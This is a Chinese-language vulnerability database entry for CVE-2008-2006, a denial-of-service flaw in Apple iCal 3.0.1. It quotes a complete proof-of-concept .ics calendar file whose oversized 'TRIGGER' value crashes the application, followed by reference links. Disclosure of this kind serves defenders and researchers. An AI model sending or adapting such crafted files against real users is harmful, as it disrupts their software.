Apple iCal 'TRIGGER' Parameter 拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115046 漏洞类型 输入验证
发布时间 2008-04-21 更新时间 2008-05-21
CVE编号 CVE-2008-2006 CNNVD-ID CNNVD-200805-292
漏洞平台 OSX CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/31619
https://www.securityfocus.com/bid/28632
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200805-292
|漏洞详情
MacOSX上的AppleiCal3.0.1允许远程CalDAV服务商和用户协助式远程攻击者借助一个.ics文件,引起拒绝服务攻击(空指针废弃和应用程序崩溃)或可能执行任意代码。该.ics文件包含(1)TRIGGER线上的一个大的16-bit整数或(2)RRULE线上的COUNT字段中的一个大的整数。
|漏洞EXP
source: http://www.securityfocus.com/bid/28632/info

Apple iCal is prone to a denial-of-service vulnerability because it fails to handle specially crafted files.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

This issue affects iCal 3.0.1 running on Mac OS X 10.5.1; previous versions may also be affected.

BEGIN:VCALENDAR
X-WR-CALNAME:Fake event
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
VERSION:2.0
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:19991003T000000
RDATE:19991003T000000
TZNAME:ARST
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:20000303T000000
RDATE:20000303T000000
RDATE:20001231T210000
TZNAME:ART
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
SEQUENCE:10
DTSTART;TZID=America/Buenos_Aires:20071225T000000
DTSTAMP:20071213T124414Z
SUMMARY:Fake Event
DTEND;TZID=America/Buenos_Aires:20071225T010000
RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1
UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9
TRANSP:OPAQUE
CREATED:20071213T124215Z
BEGIN:VALARM
X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49
ACTION:DISPLAY
DESCRIPTION:Event reminder
TRIGGER:-PT65535H
END:VALARM
END:VEVENT
END:VCALENDAR
|受影响的产品
Apple iCal 3.0.1
|参考资料

来源:XF
名称:ical-trigger-dos(42569)
链接:http://xforce.iss.net/xforce/xfdb/42569
来源:SECTRACK
名称:1020094
链接:http://www.securitytracker.com/id?1020094
来源:BID
名称:28632
链接:http://www.securityfocus.com/bid/28632
来源:BID
名称:28629
链接:http://www.securityfocus.com/bid/28629
来源:BUGTRAQ
名称:20080528Re:CORE-2008-0126:MultiplevulnerabilitiesiniCal
链接:http://www.securityfocus.com/archive/1/archive/1/492682/100/0/threaded
来源:BUGTRAQ
名称:20080527Re:CORE-2008-0126:MultiplevulnerabilitiesiniCal
链接:http://www.securityfocus.com/archive/1/archive/1/492638/100/100/threaded
来源:BUGTRAQ
名称:20080521CORE-2008-0126:MultiplevulnerabilitiesiniCal
链接:http://www.securityfocus.com/archive/1/archive/1/492414/100/0/threaded
来源:VUPEN
名称:ADV-2008-1601
链接:http://www.frsirt.com/english/advisories/2008/1601
来源:MISC
链接:http://www.coresecurity.com/?action=item&id=2219
来源:SREASON
名称:3901
链接:http://securityreason.com/securityalert/3901